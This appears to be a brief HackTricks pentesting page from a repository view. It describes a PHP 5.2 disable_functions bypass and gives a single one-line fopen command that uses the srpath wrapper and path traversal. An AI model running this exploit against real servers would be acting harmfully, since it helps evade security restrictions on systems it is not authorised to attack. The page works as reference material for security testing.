hacktricks/pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2-fopen-exploit.md
carlospolop 4c796b9bb3 Revert "Ad hacktricks sponsoring"
This reverts commit c2c270feef.
2022-04-28 16:41:46 +01:00

294 B

disable_functions bypass - PHP 5.2 - FOpen Exploit

PHP 5.2 - FOpen Exploit

From http://blog.safebuff.com/2016/05/06/disable-functions-bypass/

php -r 'fopen("srpath://../../../../../../../dir/pliczek", "a");'